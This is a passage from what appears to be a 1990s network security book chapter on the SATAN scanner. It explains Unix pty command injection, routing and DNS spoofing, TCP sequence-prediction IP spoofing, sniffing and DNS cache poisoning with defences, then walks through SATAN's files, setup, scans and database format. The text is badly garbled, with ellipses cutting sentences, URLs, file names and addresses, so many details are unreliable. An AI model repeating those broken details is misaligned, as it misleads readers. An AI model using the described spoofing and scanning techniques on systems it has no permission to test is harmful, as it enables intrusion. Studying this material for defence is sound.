only behind a firewall
...
Guessing the domain name can be done, and programs like ypx can
help to send maps
...
Export restrictions may prevent non-U
...
users from getting programs using
DES encryption
...

There are at least four ways to deal with protecting /etc/passwd:
s Shadow password files
s Password selection enforcers
s One-time passwords
s Electronic smart cards
Shadow password files store the encrypted password in a file that is accessible only to root; the
regular /etc/passwd file is world-readable
...


Note On some Linux systems and HP-UX, the /etc/securetty lists those ttys that can be
used to log in as root
...

For Sun and other systems, the /etc/ttytab file lists all ttys
...
For other systems, /etc/login
...
Study the login man page to find out details on your system
...
Essentially, these programs run
something like Crack against the proposed new password before accepting it
...
Each user has a paper (or online) printout of passwords and is required
to generate new lists occasionally
...

Another approach is to use smart cards, such as the SecurID from Security Dynamics, that
require a PIN number to be typed in and then send a password
...

If the target system has an X Windows vulnerability, the intruder can gain access to all typed
keystrokes, effectively canceling many of the preceding password security approaches
...
This prevents hackers from gaining access
to these accounts
...
The application
opens a pseudo-tty, or pty, which acts as the master and is associated with a slave tty
...

When the user types on the keyboard, the keystrokes are sent to the pty
...

The pty is described by a device file, such as /dev/pty/ttys2
...
For example:
% ll ‘pty’
crw------ 1 bkelley users 17 0x000032 Nov 20 00:51 dev/pty/ttys2
% mesg
is n
% mesg y
% ll ‘pty’
crw--w--w- 1 bkelley users 17 0x000032 Nov 20 00:51 dev/pty/ttys2
% mesg n
% ll ‘pty’
crw------ 1 bkelley users 17 0x000032 Nov 20 00:51 dev/pty/ttys2
%

p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

491

SATAN and the Internet Inferno

The mesg command enables the user to permit other users to invoke the talk or write command to send messages or interactively talk to this user
...
notreal
...
notreal
...

The problem is that it is possible to cause commands to be executed on ptys
...
If
that owner is root, the user can gain access to root using this technique
...
The global /etc/profile (or
/etc/cshrc) should use a default of mesg n so that users are required to specifically indicate this
service
...
Unless the termcap capabilities of the remote terms permit
the ability to embed execution strings, there is no way to gain access remotely
...
gated can support many routing protocols, from
DVMRP to OSPF, but most gated implementations use RIP, which is also supported by many
hardware routers
...
This could lead to disruption of
service and facilitate other attacks
...
x, the gated
...
trustedhellogateways gateway [ gateway ]

Only the routing updates from the indicated RIP or HELLO gateways are recognized as valid
...
x and 3
...
conf file can include a trustedgateways clause to specify
the same access controls for RIP, HELLO, and ICMP redirects
...
The password consists of a quoted string, 0
to 16 bytes long
...
A
hacker with a packet sniffer could gain access to these passwords and spoof a routing packet
...
Once again, IP
spoofing by a hacker could be used to insert false routing updates
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

492

Part II: Gaining Access and Securing the Gateway

DNS Searchlists
By default, a hostname lookup using the DNS resolver proceeds by appending the current
domain to the hostname and attempting a lookup
...

RFC 1535 discusses vulnerabilities to this algorithm
...
conf
domain mftg
...
com
% nslookup inv
...
notreal

At this point, the resolver first tries to look up this line:
mftg
...
com
...
notreal
...
Next, the resolver tries this:
mftg
...
com
...
com

This also fails
...

A hacker within the NotReal company could apply for the domain com
...
com, perhaps
claiming that the domain oversaw the communications department
...
At this
point, the hacker could start feeding false information to the resolver, perhaps permitting trustbased attacks using
...

The appropriate way to solve this problem is by explicitly listing a search list in the resolv
...


Investigating IP Spoofing
Although SATAN does not specifically investigate IP spoofing, its scans for vulnerabilities
involving remote shell access and other services that can be exploited using IP spoofing as the
next logical step
...
This version of IP does not include any provision for
source authentication
...

Many applications are designed to trust a packet based on the IP address of the sender
...
(This is assuming that IP source routing is turned off
...
Both of these assumptions are dangerous
...

s Spoofed IP packets were exploiting rshd/remshd by predicting TCP sequence numbers
...
A router that connects an internal
network to the Internet has at least two network ports
...
If a packet arrives from an internal IP address and is
destined for another internal IP address, the router sends it to the correct destination port
...
For example, the firewall does not allow an external user to invoke the rsh/remsh
service on an internal system by screening all requests to the shell TCP port originating from
an external address
...
All the
IP packets from all the ports were loaded into a single queue and then processed
...
Therefore, an external user just had to indicate an internal IP address to send the
packet across the router
...
The intruder
would find it difficult to carry on a TCP connection because the internal host would be
sending reply TCP packets to the internal address specified by the intruder’s fake packet
...

This is when the second problem added to the vulnerability
...
The intruder connected
to the target system and then disconnected
...
The hacker then sent the
appropriate TCP connection request to the login or shell port
...
The external system, however, has flooded
this internal host with initialization packets, causing its response time to slow down drastically
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

494

Part II: Gaining Access and Securing the Gateway

The target system assumed that the ACK that arrived originated from the internal host because
it carried the correct ACK number and IP address
...

Any service that relies on IP authentication is vulnerable to the attack described here
...

The rlogind and remshd servers approve access based on a hostname that is sent in the
protocol
...
rhosts or /etc/hosts
...
Until a few years ago, no additional verification was made by the
servers
...

This call attempts to contact the DNS server and find the name corresponding to the IP
address
...
If the DNS server exists outside the administrative
domain of the user, verification of the identity of the client is not certain
...
The DNS server could be administered by the hacker and therefore provide
untrusted information
...
This vulnerability simplifies routing problems for the hacker
...
The intruder can specify the route in the
options field of the IP packet
...
The secure portmap and rpcbind
programs also defer authorization to IP addresses
...
mountd program uses the IP
address to control access to file handles if an exported file system specifies a limited access list
...
When the fact that IP spoofing is possible is combined with the list of available services,
the number of network vulnerabilities becomes large
...


Protection
Some sort of encrypted authentication scheme would provide the best form of protection to
this vulnerability
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

495

SATAN and the Internet Inferno

For the router TCP connection attack, the only protection from permitting an unauthorized
new TCP connection as indicated earlier is randomization of the sequencing numbers between
subsequent TCP connections
...
It does not completely eliminate the
possibility that the hacker could guess the sequence number, because the value has a 32-bit
range; however, it makes it much more difficult
...

This does not provide protection over hijacked connections
...
Imagine that a user used telnet to connect to
the notreal
...
Even if the telnet used some sort of encrypted authentication with
Kerberos, if the data connection took place without encryption, the intruder could insert
packets into the data stream, effectively capturing control of the user’s keyboard
...

The other solution is higher-layer authentication, using some sort of security environment
such as Kerberos, SSL, or ssh
...

The ftpd server bounce problem is fixed in vendor patches or by getting the latest wu-ftpd
program
...
The kernels can
also be modified to prevent the automatic forwarding of IP packets that arrive at the network
port but are destined for other systems
...

Another IP problem exists with regard to fragmented packets whose fragmentation boundaries
lie within TCP packet headers
...


A Long-Term Solution
The newest standard for IP, version 6, includes support for packet-level authentication
...

Broad support from router manufacturers and Unix kernel vendors is required before applications using v6 will become available and popular
...


Examining Structural Internet Problems
Unfortunately, some Internet vulnerabilities are quite difficult to fix: they involve a fundamental change in the way the Internet operates, requiring modifications that could be unacceptable
to the expected functionality of Internet applications
...
Added to this problem is the need for caching to improve the performance of the
distributed database
...
Such cache corruption can be used to
attack rlogind and rshd/remshd
...

The cache corruption can take place by adding extra resource records to replies destined for a
name server
...
Schuba and E
...
The paper calls this the “Me Too” attack
...
If SATAN would implement the fourth level of scan, “All Out,” it is
highly likely that a DNS cache corruption attack would be included
...
However,
the resulting performance drop on the DNS infrastructure would virtually eliminate its
usefulness—a major setback to the performance and usefulness of the Internet
...


Sniffers
A packet sniffer is a program that runs on a system and captures every network packet that
travels past the network interface, even if it is not destined for this system or originated on this
system
...
Recent sniffer attacks on the Internet have resulted in the disclosure of
hundreds of thousands of passwords, because many network protocols transmit the passwords
in clear text
...
Once the presence of this
application is known, packet sniffing can record packets destined for this port
...
SATAN is useful for a hacker whose goal is to locate active https ports on the
Internet
...
All cryptographic schemes use some sort of session key that is generated
based on a random number seed
...
Predictability of the random number seed can decrease the effective bit size of session
keys
...
Netscape depends on SSL and permits up to
a 128-bit session key to be used for encryption
...
The PC offers limited facilities for generating a random number: the clock
offers marginal granularity, and other variables provide little additional randomization
...
Such a limited key space could be quickly searched, resulting in
key disclosures in minutes rather than years, as had been assumed
...

It is important to clearly examine the true key size of an algorithm
...
S
...
One might
wonder about the effective key size of the skipjack algorithm, used in the Clipper chip and not
released to the public: the same government agencies that make the 64-bit claim for DES also
make an 80-bit claim for skipjack
...
The
binary program could be corrupted on the remote system with some sort of virus, or the binary
could be modified during the file transfer to your system
...
Running
these programs can open your system to attack if trojan code is embedded in the binary
...
Users should closely examine code before
compiling and running software of undetermined origin
...

However, if the source comes from a university FTP archive and no PGP signature is available,
the potential exists
...
A
PGP signature of each source file, or of a file containing md5 checksums, is the ideal way to
verify source integrity
...
A fake TCP packet containing the modified
data was inserted into the connection by hackers who monitored the connection using packet
sniffers
...
The modifications decreased the strength of the encryption, permitting users to erroneously assume greater security for the transmission of secret
information, such as credit card numbers
...
These PGP
signatures should be used to confirm the integrity of any file
...
asc files containing PGP signatures for all distributions
...
These
services are nearly always accessible to users “cruising” the Internet
...
It is quite difficult to avoid denial of service attacks
...
Nothing prevents a user from sending millions of useless e-mail messages, each one small
enough to be accepted
...
ftpd can limit the amount of disk space available to transfers, and sendmail can limit the size of an individual e-mail message, but this won’t stop a
determined attacker
...

The best remedy is to use a firewall to limit the exposure of the majority of systems to random
Internet attacks
...


PostScript Files
It is possible to embed command sequences in PostScript files
...
The safest way to view
unknown
...
That is the default action indicated in most

...
ps files
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

499

SATAN and the Internet Inferno

Rendezvous with SATAN
“‘Before we start to struggle out of here,
O master,’ I said when I was on my feet,
‘I wish you would explain some things to me
...


Getting SATAN
The CD included with this book contains SATAN
...
mcs
...
gov/pub/security

s

ftp://coast
...
purdue
...
cso
...
edu/security/satan-1
...
1
...
Z

s

ftp://ftp
...
dk/pub/security/tools/satan/satan-1
...
1
...
Z

s

http://ftp
...
se/pub/unix/security/satan-1
...
1
...
Z

s

ftp://ftp
...
se/pub/unix/security/satan-1
...
1
...
Z

s

ftp://ftp
...
edu
...
1
...
tar
...
acsu
...
edu/pub/security/satan-1
...
1
...
Z

s

ftp://ftp
...
buffalo
...
1
...
tar
...
net
...
edu/pub/security/satan/satan-1
...
1
...
Z

s

ftp://ftp
...
net/pub/software/unix/security/

s

ftp://coombs
...
edu
...
wi
...
nl/pub/security

s

ftp://ftp
...
ruu
...
1
...
tar
...
cert
...
de/pub/tools/net/satan/satan-1
...
1
...
Z

s

ftp://cnit
...
su/pub/unix/security/satan

p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

500

Part II: Gaining Access and Securing the Gateway

s

ftp://ftp
...
com/pub/security/satan-1
...
1
...
Z

s

ftp://ftp
...
edu/pub/packages/satan/satan-1
...
1
...
Z

s

ftp://ciac
...
gov/pub/ciac/sectools/unix/satan/

s

ftp://ftp
...
unit
...
1
...
tar
...
win
...
nl/pub/security/satan-1
...
1
...
Z

After you have ftped SATAN to your system, use uncompress satan-1
...
1
...
Z (or
compress -d) and then tar xvf satan-1
...
1
...

At this point, the SATAN directory should look like this:
Changes
Makefile*
README

TODO
bin/
config/

html/
include/
perl/

perllib/
reconfig*
repent*

rules/
satan
satan
...
ps
src/

Examining the SATAN Files
A more detailed look at the files and directories included in the SATAN distribution provides
an insight into how SATAN works and how it can be extended
...
1
...
8: A man page for the command-line version of SATAN
s satan
...
paths, PERL location
s repent: Changes all occurrences of SATAN to SANTA
s Changes: List of changes to SATAN program
Note that SATAN creates a satan-1
...
1/results directory to store the results
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

501

SATAN and the Internet Inferno

The include Directory
The include directory is created only for Linux
...
SATAN creates the following two directories but
does not put any files into them
...
h, it
assumes that all the netinet files are missing and tells the user to put the netinet files from
44BSD into the following directory:
s include/netinet/

The rules Directory
The rules directory is critical to the functioning of SATAN
...
It includes the following files:
s rules/facts: Deduces new facts based on existing data
s rules/hosttype: Recognizes hosts based on banners
s rules/services: Classifies host by available services
s rules/todo: Specifies what rules to try next
s rules/trust: Classifies trust based on the database records
s rules/drop: Specifies which facts to ignore, such as NFS export cdroms

The config Directory
SATAN users need to customize the pathnames to system utilities in the appropriate files in
the config directory
...
cf, is located here
...

This directory includes the following files:
s config/paths
...
sh: Path variables for shell execution
s config/satan
...
pl: SATAN version file
s config/services: An /etc/services file, just in case

p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

502

Part II: Gaining Access and Securing the Gateway

The PERLlib Directory
The PERLlib directory includes two files from the PERL5
...
000 FTP sites
...
It includes the following files:
s PERLlib/ctime
...
pl: Gets command-line options
s PERLlib/README: Explains why these PERL files are included

The bin Directory
The bin directory contains the actual executables used by SATAN to investigate remote
systems
...
All the distributed
...
Each
...

SATAN refers to each
...
Users can execute each of these PERL scripts
by hand to investigate the particular vulnerabilities
...
Users who wish to add extra security checks can create
similar files and place them here with the
...

This directory includes the following files:
s bin/boot
...
satan: Uses nslookup to gather DNS records on target
s bin/finger
...
satan: Checks for anonymous FTP and writeable home dir
s bin/nfs-chk
...
satan: Tries to execute program on rexd
s bin/rpc
...
satan: Sees whether + + is in hosts
...
satan: Gets rusersd to list users
s bin/showmount
...
satan: Tries to connect to list of TCP ports

p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

503

SATAN and the Internet Inferno

s bin/tftp
...
satan: Looks for services on list of UDP ports
s bin/xhost
...
satan: Tries to guess the NIS domain name
s bin/faux_fping: fping wrapper that skips unresolvable hosts
s bin/get_targets: Uses fping to scan a subnet for live hosts
s bin/yp-chk
...
The PERL scripts generate HTML
pages on-the-fly, whereas the many
...
A
regular user of SATAN would never actually examine any of these files by hand, because the
initial SATAN HTML page provides links into each of these pages
...
This directory includes the following files:
s html/name
...
Explains the origin of the name “SATAN”
s html/satan
...
Generates the opening SATAN Web page
s html/satan_documentation
...
Generates the SATAN documentation Web page

The html/docs Directory
The html/docs directory contains valuable information on the internal workings of SATAN
...
rules, satan
...
db, and trust pages
...

This directory includes the following files (no descriptions are included—the filenames are
self-explanatory):
s html/docs/acknowledgements
...
html
s html/docs/authors
...
html
s html/docs/design
...
html
s html/docs/getting_started
...
html
s html/docs/references
...
html
s html/docs/the_main_parts
...
html
s html/docs/satan
...
html
s html/docs/artwork
...
html
s html/docs/FAQ
...
html
s html/docs/satan
...
html
s html/docs/satan
...
html
s html/docs/satan
...
html
s html/docs/user_interface
...
html
s html/docs/admin_guide_to_cracking
...
html

The html/dots Directory
The html/dots directory contains the colored GIF drawings that are used in the SATAN user
interface
...
gif
s html/dots/bluedot
...
gif

p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

505

SATAN and the Internet Inferno

s html/dots/dot
...
gif
s html/dots/greendot
...
gif
s html/dots/orig
...
gif
s html/dots/pinkdot
...
gif
s html/dots/reddot
...
gif
s html/dots/yellowdot
...
(The listings are
self-explanatory, but notice that a GIF of Santa Clause is included to support the top-level
“repent” command that changes all SATAN references to SANTA references, to soothe the
concerns of users who are offended by the SATAN name):
s html/images/satan
...
gif
s html/images/satan-almost-full
...
gif

The html/reporting Directory
The html/reporting directory contains PERL scripts that emit HTML pages that provide
summary reports of the vulnerabilities found on targets listed in the SATAN database
...
Note the
one-to-one corresponce between these filenames and the report screens found in the SATAN,
the report “SATAN Information by Subnet” is generated by satan_info_subnet
...
pl-
...
pl-
...
pl
s html/reporting/satan_info_subnet
...
pl
s html/reporting/satan_severity_types
...
pl
s html/reporting/satan_results_danger
...
pl
s html/reporting/satan_info_OSclass
...
pl
s html/reporting/satan_info_servers
...
pl
s html/reporting/satan_info_trusting
...
pl
s html/reporting/satan_info_host
...
pl
s html/reporting/satan_info_clients
...
pl
s html/reporting/satan_results_domain
...
pl
s html/reporting/satan_results_trusted
...
pl

The html/running Directory
The html/running directory contains the two PERL scripts that begin and control the SATAN
scans:
s html/running/satan_run_form
...
Runs in response to the selection of SATAN
Target Selection from the SATAN Control Panel

p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

507

SATAN and the Internet Inferno

s html/running/satan_run_action
...
Executes the SATAN scan and collects the data
when the previous SATAN Run Form screen’s Start the scan field is selected

The html/tutorials Directory
The html/tutorials directory contains useful Web pages for understanding SATAN and the
vulnerabilities that SATAN finds (the filenames are self-explanatory):
s html/tutorials/vulnerability_tutorials
...
html
s html/tutorials/first_time/learning_to_use
...
html
s html/tutorials/first_time/scanning
...
html
s html/tutorials/vulnerability/-NFS_export_via_portmapper
...
html
s html/tutorials/vulnerability/REXD_access
...
html
s html/tutorials/vulnerability/remote_shell_access
...
html
s html/tutorials/vulnerability/-unrestricted_X_server_access
...
html
s html/tutorials/vulnerability/Sendmail_vulnerabilities
...
html
s html/tutorials/vulnerability/unrestricted_modem
...
html

p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

508

Part II: Gaining Access and Securing the Gateway

The html/admin Directory
The html/admin directory contains the PERL scripts that permit a user to dynamically
configure the satan
...
cf file
...
pl
...
pl
...
SATAN stores the results of scans into databases using a
standard database record format
...
The files in this directory create the SATAN Data Management
screen and execute the actions requested from that screen:
s html/data/satan_data_form
...
Displays the SATAN Data Management Web page
s html/data/satan_merge_action
...
Opens the requested SATAN database and
merges it with another
...
pl
...
These are written in C for
increased speed and compatibility
...


The src/boot Directory
The boot program generates an rpc call to the target system requesting the BOOTPARAM
service to get the NIS domain name
...
satan only if the remote portmap listing indicates the bootparam service:
s src/boot/Makefile
...
c
...
x
...
x file to generate the RPC stubs to
support boot
...

The html
...
The rex program makes a simple request to the remote rexd to
prove that access is possible
...
The safe_finger program is a version of finger that prevents returning fingerd information from causing harm
...

This directory includes the following files:
s src/misc/Makefile
...
h
...
c
...
h
...
c
s src/misc/md5c
...
Contains support code for md5
...
c
...
c
...
x
...
c
s src/misc/sys_socket
...
Replaces PERL’s socket
...
c
...
c
...
This directory includes the following files:
s src/nfs-chk/Makefile
s src/nfs-chk/mount
...
c
s src/nfs-chk/nfs_prot
...

These two programs scan an indicated target over an indicated range of ports by attempting to
connect to the ports on the target
...
c
s src/port_scan/find_addr
...
h
s src/port_scan/strerror
...
c
s src/port_scan/non_blocking
...
c
s src/port_scan/print_data
...
c
s src/port_scan/tcp_scan
...
c
s src/port_scan/udp_scan
...
This program is a replacement for the standard ping program and features the capability to more quickly scan a number
of remote hosts to determine whether these hosts are alive
...
c

p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

511

SATAN and the Internet Inferno

s src/fping/fping
...
VMS
s src/fping/AUTHOR

The src/rpcgen Directory
The src/rpcgen contains the source for the rpcgen program, a utility created by Sun that creates
rpc stub files based on an
...
The rpcgen utility is shipped on many systems, but SATAN
requires it to run, so the creators of SATAN included the source, just in case
...

This directory includes the following files:
s src/rpcgen/Makefile
s src/rpcgen/rpc_clntout
...
c
s src/rpcgen/rpc_hout
...
c
s src/rpcgen/rpc_parse
...
h
s src/rpcgen/rpc_scan
...
h
s src/rpcgen/rpc_svcout
...
c
s src/rpcgen/rpc_util
...
The yp-chk program attempts
to see if an NIS map is available and prints the first record of that map if it is available
...
x
s src/yp-chk/yp-chk
...

Notice that the html
...

This directory includes the following files:
s perl/config
...
Rewrites the satan
...
pl
...
pl
...
pl
...
pl
...
pl
...
pl
...
pl
...
pl
...
pl
...
pl
...
pl
...
pl
...
pl
...
pl
...
pl
...
paths
s perl/run-satan
...
Sets up list of targets, executes scans against targets, collects facts,
processes todo information, and saves data
s perl/satan-data
...
Includes data management routines
s perl/services
...
Classifies host by services used and provided
s perl/severities
...
Classifies vulnerabilities
s perl/shell
...
Runs a command and uses a timeout to ensure that it finishes
s perl/socket
...
Executes sys_socket binary
s perl/subnets
...
Sifts subnet information
s perl/suser
...
Checks if SATAN is running as root
s perl/targets
...
Generates target lists, executes target probes, and saves scan information
s perl/todo
...
Stores and processes information about hosts discovered while scanning a
target
s perl/trust
...
Maintains trust statistics
s perl/status
...
Maintains time, date, and status file

Note PERL 5
...
PERL 5
...
cis
...
edu/pub/gnu/mirror/perl5
...
tar
...


Building SATAN
Even though SATAN consists of a large number PERL, C, and HTML files, building SATAN
is quite straightforward and quick
...
(SATAN’s only possible weakness could be its speed—as a result of the large
number of PERL scripts and modularity, SATAN is not as fast as a comparable monolithic
binary
...
The entire process takes only a few minutes
...
Edit the paths
...
sh files in config/ to point to the actual location of utilities on
your system
...
Edit the config/satan
...
Specifically, you should
consider adding entries to $only_attack_these and $dont_attack_these
...
For example, you
might want to run scans only against systems inside notreal
...
com domain
...
cf from within SATAN using the SATAN
Configuration Management screen
...
Run the reconfig script
...
00x and a Web
browser
...
pl
file to point to the Web browser of choice
...

4
...
1
...
You need to specify a system type,
such as irix5
...
The authors of SATAN recommend that you unset proxy environment variables or
browser proxy settings
...
su or log in to root
...
Run the satan script
...
pl, and the Web browser to talk to this HTML server
...

To use SATAN from the command line, you must list command-line arguments as indicated
by the satan
...
Note that the authors recommend against using the command-line
version of SATAN, because the user interface involves many command-line arguments that can
be somewhat confusing
...


Using SATAN’s HTML Interface
The interactive version of SATAN consists of a sequence of HTML pages that are viewed
through the Web browser
...
Most screens give a link back to the SATAN
Control Panel
...
8
...

There you find links to HTML pages that enable you to do the following:
s Manage the data gathered by SATAN
s Choose target systems and run scans
s Generate reports and analyze data
s Modify the default configuration for searches
s Gain access to SATAN’s documentation and tutorials

Figure 8
...


In addition to the major options listed, a few links permit the user to FTP the latest version of
SATAN from a Dutch FTP archive, to change the name of the program to SANTA (if the
name SATAN offends you), to find information about the artwork in the program, and to find
information about the authors of the program
...
The default name of the database file is satan-data
...
If you choose
the SATAN Data Management option from the SATAN Control Panel, your Web browser
displays the screen shown in figure 8
...
The screen shows you the names of the existing
databases and enables you to do the following:
s Open an existing database
...

s Merge current data with an existing database
...
2
The SATAN Data
Management screen
...
2 includes a TCP port number and a
32-byte value
...
pl) is listening on, and the 32-byte value is the password that permits access
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

517

SATAN and the Internet Inferno

Target Selection
When you are ready to run a SATAN scan, choose the SATAN Target Selection option on the
SATAN Control Panel
...
3—the SATAN Target Selection screen
...
cup
...
com)
s Whether SATAN should scan all hosts on the same subnet
s The level of the scan (light, normal, or heavy)

Figure 8
...


After specifying this information, you can now initiate the scan
...
satan scripts) being executed, along with
parameters, on the SATAN Data Collection screen shown in figure 8
...
Note that each
component scan program is invoked using the timeout program
...

The signal that the timeout program sends, and the timeout values, can be configured using
the satan
...
Notice from figure 8
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

518

Part II: Gaining Access and Securing the Gateway

Figure 8
...


After the scan completes, you can select the View Primary Target Results option from the
SATAN Data Collection screen to get to the SATAN Results screen, shown in figure 8
...
The
SATAN Results screen provides a summary of information about the host, as well as a list of
vulnerability information
...


Reporting and Data Analysis
After running scans on several hosts, you might want to generate reports or analyze the data
from multiple hosts
...
6
...
5
The SATAN Results
screen
...
6
The SATAN Reporting
and Analysis screen
...
By selecting the By Type of
Vulnerability option on the SATAN Reporting and Analysis screen, you get the SATAN
Vulnerabilities - By Type report shown in figure 8
...
This screen is very useful if you are trying
to eliminate security problems of a certain type
...


Figure 8
...


Configuration Management
By choosing the SATAN Configuration Management option from the SATAN Control Panel,
you can modify the configuration set in satan
...
Using the screens shown in figures 8
...
9, you can modify the following parameters:
s The directory to keep the data in
s The default probe level
s The timeout value for each network probe
s The kill signal sent to tool processes at timeout
s The maximum proximity amount (maximal proximity)
s The proximity descent value
s Whether to stop when the probe level hits 0
s Whether to scan the entire subnet of the target
s Whether the intruder system is trusted

p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

521

SATAN and the Internet Inferno

s Limits on what hosts to probe (by domain name or subnet address)
s Limits on what hosts cannot be probed
s Two workarounds: one tells SATAN to use nslookup (for NIS environments) or
gethostbyname() lookups (for DNS environments), and one that tells SATAN to use or
not use ping (because ping depends on ICMP, environments where ICMP does not
work will want to avoid ICMP—not many systems fall into this category)
...
8
The SATAN Configuration
Management screen, part 1
...
9
The SATAN Configuration
Management screen, part 2
...
SATAN treats any host information gained from a
scan of a single target system as having a proximity of 1 to the target system
...
rhosts/hosts
...
If you
scan with a maximal proximity setting of 2, the number of hosts scanned can become quite
large
...
You can imagine the exponential growth involved with SATAN scans that use a
maximal proximity setting greater than 2
...

The proximity descent field can be used to decrease the intensity of the scan as SATAN moves
the scan out to less proximate hosts
...
The target is scanned at the heavy level, the hosts at proximity of 1 are scanned at the
normal level, and the hosts at proximity of 2 are scanned at the light level
...
For example, if the target was 192
...
13
...
12
...
1 to 192
...
13
...
(Note that x
...
x
...
x
...
255 are
typically reserved for broadcast and are not assigned to individual hosts
...
10
...


Figure 8
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

523

SATAN and the Internet Inferno

The following are the three most useful parts of the documentation:
s SATAN Reference
s Vulnerabilities Tutorials
s Admin Guide to Cracking
The SATAN Reference provides detailed information about SATAN, the database records, and
the inference engine
...
If you choose the “Vulnerabilities - a Tutorial” option from the SATAN Documentation screen, SATAN brings up the list of these tutorials, as shown in figure 8
...


Figure 8
...

For example, if you choose the Remote Shell Access option from the Vulnerabilities screen,
SATAN brings up the Remote Shell Access screen shown in figure 8
...

Note that many of the tutorial screens, such as the one shown in figure 8
...
This influential document was written by the authors of SATAN and led to
the creation of SATAN
...
If you select the Admin Guide to Cracking option from the Remote Shell Access
screen, SATAN brings up the paper, as shown in figure 8
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

524

Part II: Gaining Access and Securing the Gateway

Figure 8
...


Figure 8
...


Running a Scan
Follow these steps to run a scan:
1
...
1
...
Select the SATAN Configuration Management option and modify the settings as
discussed previously
...

3
...

4
...

5
...

6
...

You have now completed the SATAN scan
...
To generate reports that help you sort this data, choose
the SATAN Reporting & Data Analysis option from the SATAN Control Panel
...


Understanding the SATAN Database Record Format
There are three types of database records: facts, all-hosts, and todo
...
These files are typically in a
subdirectory of satan called results/satan-data
...

The facts file contains the results of vulnerability scans; each record of this file is called a fact
...
The todo file keeps
track of which probes have been run against a target
...
satan script (program) is required to output text records that are directly stored into the
facts database file
...
Newlines separate entries in this file
...
The rulesets use PERL search capabilities to match against records from the
facts file
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

526

Part II: Gaining Access and Securing the Gateway

Each SATAN fact consist of the following eight fields:
s Target
s Service
s Status
s Severity
s Trusted
s Trustee
s Canonical service output
s Text

Target ($target)
This is the name of the host that the record refers to
...
If that fails, it uses an
estimated name or partial name
...
satan suffix removed
...
satan, this is the name of the service probed
...

The l severity corresponds to login information gathered from rusers
...
satan
...
The nw indicates that
the nobody user can write files
...
(Note that permissions corresponding to the
nobody user directly relate to world access settings on files
...

In general, if a hacker can modify any non-root user file, the hacker can modify executables
that the user will run, resulting in the ability of the hacker to gain execution access
...


Trusted ($trusted)
This field consists of two tokens separated by an @—the left part being a user and the right
part being a host
...
) It
represents an account or directory that trusts another target
...
The host part can be either the
target system or ANY, but only the target system makes sense for the Trusted field
...


Trustee ($trustee)
This field represents those users and systems that are trusted by the accounts listed in the
$trusted field
...


Canonical Service Output ($canonical)
For non-vulnerability records, this contains a formatted version of the information, either user
name, home dir, last login or filesys, clients
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

528

Part II: Gaining Access and Securing the Gateway

Text ($text)
This contains messages used for reports
...


Sample Fact Record
Here is an example of the output of the rpc
...
satan m2
...
com
m2|ftp|a|x|||ANONYMOUS|offers anon ftp
m2|ftp|a|nw|˜ftp|ANY@ANY|writable FTP home directory|˜ftp is writable
%

Both facts have a $target of m2, a $service of ftp, and indicate a $status of a (available)
...
The $trusted and $trustee fields do not apply to the
first record, but the second record indicates that the ˜ftp directory ($trusted) grants access to
anyone on any other system ($trustee = ANY@ANY)
...
” Finally, the $text fields for both
records describe the problem for reporting purposes
...
satan tools assume that they are being run with a
default directory of the top-level SATAN program, satan-1
...
1
...
satan tries to include config/paths
...
1
...
Either run these tools from that directory, as shown in the example, or modify
these tools to include absolute pathnames
...
1
...
This file will be filled with records generated by
the
...


Seeing All the Hosts
The all-hosts text file contains host records, which are used to keep track of hosts that SATAN
has seen, regardless of whether these hosts have been scanned by SATAN
...
Newlines separate entries in this
file
...
1
...
notreal
...
34
...
78|0|2|0|817008639
mailhub
...
com|12
...
45
...
notreal
...


Examining All the Things It Did
The SATAN todo file contains a list of hosts, and probes that have been run against those
hosts
...
The fields are
as follows:
s The hostname
s The name of the tool that was run against that host
s Any arguments used by that tool during the run against that host
The best way to understand this database format is to look at the satan-1
...
1/results/satandata/todo file:
m2
...
com|tcpscan
...
notreal
...
satan|
m2
...
com|rpc
...
notreal
...
satan|-d m2
...
com:0

Notice that the system m2
...
com had tcpscan
...


Understanding the SATAN Rulesets
When making a scan, SATAN first examines vulnerabilities that are explicitly listed in the scan
level of the satan
...
The scan level can indicate optional checks for a vulnerability by

p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

530

Part II: Gaining Access and Securing the Gateway

listing it with a ?
...

For example, the light scan includes showmount
...
satan entry
...
satan script is run only if the mount service is available on the target
system, and this information is available as a result of the rpc
...
This conditional
execution can speed up the execution of SATAN by avoiding unnecessary tests
...


drop
The drop file is used to determine which facts should be ignored
...
Note that cdrom directories that are
NFS-exported but are not named /cdrom are not dropped from the facts database
...
The single
rule included in the drop file is
$text =˜ /exports \/cdrom/i

This rule says that the record should be dropped if the $text field contains exports /cdrom,
because that is the field between the //
...


facts
The facts file deduces new facts based on existing data
...

An example clarifies this structure:
/runs rexd/
¯vulnerable

